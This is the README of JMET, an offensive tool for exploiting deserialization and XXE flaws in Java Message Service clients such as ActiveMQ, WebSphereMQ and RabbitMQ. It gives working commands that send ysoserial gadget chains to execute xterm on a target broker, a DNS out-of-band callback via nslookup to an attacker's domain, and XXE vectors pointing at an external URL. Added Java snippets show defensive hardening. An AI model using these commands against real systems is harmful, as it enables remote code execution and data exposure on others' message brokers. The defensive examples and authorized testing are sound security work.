# JMET
The Java Message Exploitation Tool
https://github.com/matthiaskaiser/jmet
Description
JMET was released at Blackhat USA 2016 and is an outcome of Code White's research effort presented in the talk "Pwning Your Java Messaging With Deserialization Vulnerabilities". The goal of JMET is to make the exploitation of the Java Message Service (JMS) easy. In the talk more than 12 JMS client implementations were shown to be vulnerable to deserialization attacks. The specific deserialization vulnerabilities were found in ObjectMessage implementations (classes implementing javax.jms.ObjectMessage). The following more or less complete list shows the vulnerable JMS broker client libraries:
Apache ActiveMQ
Redhat/Apache HornetQ
Oracle OpenMQ
IBM WebSphereMQ
Oracle Weblogic
Pivotal RabbitMQ
IBM MessageSight
IIT Software SwiftMQ
Apache ActiveMQ Artemis
Apache QPID JMS
Apache QPID Client
Amazon SQS Java Messaging
For creating gadget payloads JMET makes use of Chris Frohoff's ysoserial.
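The weakness all of the listed clients share is that ObjectMessage.getObject() hands a producer-controlled byte stream to Java deserialization. As an added, defender-side example that is not part of JMET or of any of the listed libraries, the following ActiveMQ consumer restricts which classes getObject() may resolve (the trusted-packages setting of the ActiveMQ client, available in 5.12.2 and later) and drops message types the application does not expect without deserializing them; the broker URL, queue name and the com.example.orders package are constructed placeholders.

```java
import java.util.Arrays;
import javax.jms.Connection;
import javax.jms.JMSException;
import javax.jms.Message;
import javax.jms.MessageConsumer;
import javax.jms.Session;
import javax.jms.TextMessage;
import org.apache.activemq.ActiveMQConnectionFactory;

// Added example, not part of JMET: an ActiveMQ consumer that never feeds an
// untrusted serialized object to ObjectInputStream. Broker URL, queue name
// and the com.example.orders package are constructed placeholders.
public class HardenedConsumer {

    // Only classes from explicitly trusted packages are resolved when
    // ObjectMessage.getObject() is called; anything else fails with a
    // JMSException instead of running a gadget chain.
    static ActiveMQConnectionFactory trustedFactory(String brokerUrl) {
        ActiveMQConnectionFactory cf = new ActiveMQConnectionFactory(brokerUrl);
        cf.setTrustAllPackages(false);
        cf.setTrustedPackages(Arrays.asList("com.example.orders"));
        return cf;
    }

    // Accept-list by message type: this application expects TextMessage only,
    // so an ObjectMessage (or any other type) is logged and dropped without
    // ever touching its serialized body.
    static void handle(Message message) {
        try {
            if (message instanceof TextMessage) {
                String body = ((TextMessage) message).getText();
                System.out.println("text message received, " + body.length() + " chars");
            } else {
                System.err.println("rejected unexpected " + message.getClass().getSimpleName()
                        + ", JMSMessageID=" + message.getJMSMessageID());
            }
        } catch (JMSException e) {
            System.err.println("rejected malformed message: " + e.getMessage());
        }
    }

    public static void main(String[] args) throws Exception {
        Connection conn = trustedFactory("tcp://broker.example.internal:61616").createConnection();
        conn.start();
        Session session = conn.createSession(false, Session.AUTO_ACKNOWLEDGE);
        MessageConsumer consumer = session.createConsumer(session.createQueue("event"));
        consumer.setMessageListener(HardenedConsumer::handle);
    }
}
```

Clients other than ActiveMQ have no common equivalent of setTrustedPackages, so the type accept-list in handle() is the part that carries over; on Java 9+ a JVM-wide ObjectInputFilter (JEP 290) adds a second layer.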
Supported JMS client libraries
Apache ActiveMQ
Redhat/Apache HornetQ
Oracle OpenMQ
IBM WebSphereMQ
Oracle Weblogic
Pivotal RabbitMQ
IBM MessageSight
IIT Software SwiftMQ
Apache ActiveMQ Artemis
Apache QPID JMS
Apache QPID Client
Amazon SQS Java Messaging
Dependencies
JMET depends on a lot of libraries :(. For details see the Maven POM file.
Installation
Just download jmet-0.1.0-all.jar from here or build it (see "Build instructions").
Usage
$ java -jar target/jmet-0.1.0-all.jar
ERROR d.c.j.JMET [main] Misconfiguration: Missing required options: [-C Custom script exploitation mode, -Y Deser exploitation mode, -X XXE exploitation mode], [-T topic name, -Q queue name], I
usage: jmet [host] [port]
-C,--Custom <scriptname> Custom script exploitation mode
-f,--filter <scriptname> filter script
-I,--impl <arg> ActiveMQ| Artemis| WebSphereMQ| Qpid10|
Qpid09| HornetQ| SwiftMQ| RabbitMQ|
OpenMQ
-pw,--password <pass> password for authentication
-Q,--Queue <name> queue name
-s,--substitute Substituation mode: Use §§ to pass
ysoserial payload name to CMD
-T,--Topic <name> topic name
-u,--user <id> user for authentication
-v,--verbose Running verbose mode
-X,--XXE <URL> XXE exploitation mode
-Xp,--xxepayload <payloadname> Optional: XXE Payload to use EXTERNAL|
PARAMATER| DTD
-Y,--ysoserial <CMD> Deser exploitation mode
-Yp,--payload <payloadname> Optional: Ysoserial Payload to use
BeanShell1| CommonsBeanutils1|
CommonsCollections1|
CommonsCollections2|
CommonsCollections3|
CommonsCollections4|
CommonsCollections5| Groovy1|
Hibernate1| Hibernate2| Jdk7u21| JSON1|
ROME| Spring1| Spring2
-Zc,--channel <channel> channel name (only WebSphereMQ)
-Zq,--queuemanager <name> queue manager name (only WebSphereMQ)
-Zv,--vhost <name> vhost name (only AMQP-Brokers:
RabbitMQ|QPid09|QPid10)
Gadget exploitation mode
Create gadgets for executing "xterm" and send them all to queue "event". ActiveMQ is chosen as the implementation; the target system is "jmstarget", listening on port 61616.
$ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -Y xterm jmstarget 61616
To find out which gadget was executed, use the "substitution" mode with an out-of-band channel such as DNS. To pass the gadget name to your command, use the "§§" string, which is then substituted with the gadget name.
$ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "nslookup §§.yourdomain.com" jmstarget 61616
XXE exploitation mode
The XXE exploitation mode requires a URL to be specified, which is resolved as an external entity. The XXE vectors are sent inside a TextMessage.
$ java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -X http://192.168.85.148:8081 jmstarget 61616
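Since the XXE vectors travel as plain text, the exposed component is whatever XML parser the consumer applies to the TextMessage body. As an added, defender-side example that is not part of JMET, the following parser configuration refuses DOCTYPE declarations and disables external entity and DTD resolution before the body is parsed; the sample message bodies are constructed.

```java
import java.io.StringReader;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;

// Added example, not part of JMET: the consumer side of a TextMessage whose
// body is XML, with the parser hardened against external entity resolution.
public class HardenedXmlConsumer {

    static DocumentBuilder hardenedBuilder() throws Exception {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        // Reject any DOCTYPE outright; a plain data message never needs one.
        dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces in case a parser implementation ignores the feature above.
        dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
        dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        dbf.setXIncludeAware(false);
        dbf.setExpandEntityReferences(false);
        return dbf.newDocumentBuilder();
    }

    // Parses the text body of a JMS TextMessage; returns null when the body was rejected.
    static Document parseBody(String xmlBody) throws Exception {
        try {
            return hardenedBuilder().parse(new InputSource(new StringReader(xmlBody)));
        } catch (SAXParseException e) {
            System.err.println("rejected XML message: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample bodies: a plain event, and one carrying a (harmless,
        // internal-only) DOCTYPE, which the hardened parser still refuses.
        String plain = "<event id=\"42\"><type>login</type></event>";
        String withDoctype = "<!DOCTYPE event [ <!ENTITY e \"x\"> ]><event>&e;</event>";
        System.out.println("plain body accepted: " + (parseBody(plain) != null));
        System.out.println("doctype body accepted: " + (parseBody(withDoctype) != null));
    }
}
```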
Custom exploitation mode
The custom exploitation mode allows running a custom JavaScript script. Its purpose is to support different serialization formats (JSON, etc.) and custom payloads.
The following example script uses the XML serialization library XStream. The string "Object" is serialized to XML and put into a TextMessage using the de.codewhite.jmet.target.JMSTarget.addTextPayload(String payloadName, String payloadText) method. Required libraries need to be put into the "external" directory of JMET.
```javascript
// Custom exploitation mode script: JMET calls payload(target) once.
function payload(target) {
    // Make the Java packages visible to the script (Nashorn JavaImporter).
    var imports = new JavaImporter(java.io, java.lang, com.thoughtworks.xstream);
    with (imports) {
        var xstream = new XStream();
        // Serialize the string "Object" to XML and register it as a TextMessage payload.
        target.addTextPayload("test", xstream.toXML("Object"));
    }
}
```
Filter scripts
Filter scripts are used for modifying "javax.jms.Message" instances before they are sent to the target destination. The following JavaScript changes the JMSPriority of every message, prints out a string and returns the modified message.
```javascript
// Filter script: JMET calls filter(message) for every javax.jms.Message before sending it.
function filter(message) {
    message.setJMSPriority(3);
    print("Changed Priority");
    return message;
}
```
Build instructions
Please put the following libraries of the commercial brokers into a directory of your choice (e.g. DIR).
com.ibm.mq.allclient.jar (WebSphere MQ)
amqp.jar (SwiftMQ)
jms.jar (SwiftMQ)
swiftmq.jar (SwiftMQ)
Then invoke maven with the property "commercial" set to your path.
$ export MAVEN_OPTS=-Xss10m
$ mvn clean compile assembly:single -Dcommerical=DIR
If you don't want to use the commercial brokers at all, you can just delete the following files:
src/main/java/de/codewhite/jmet/target/impl/WebSphereMQTarget.java
src/main/java/de/codewhite/jmet/target/impl/SwiftMQTarget.java
$ export MAVEN_OPTS=-Xss10m
$ mvn clean compile assembly:single
Disclaimer
JMET is a proof-of-concept tool for blackbox testing of JMS destinations. Please use this tool with care and only when authorized. Be aware that sending an invalid message to a JMS destination might result in a denial-of-service state (DoS) of the target system. You have been warned!!!
License
JMET is released under The MIT License (MIT).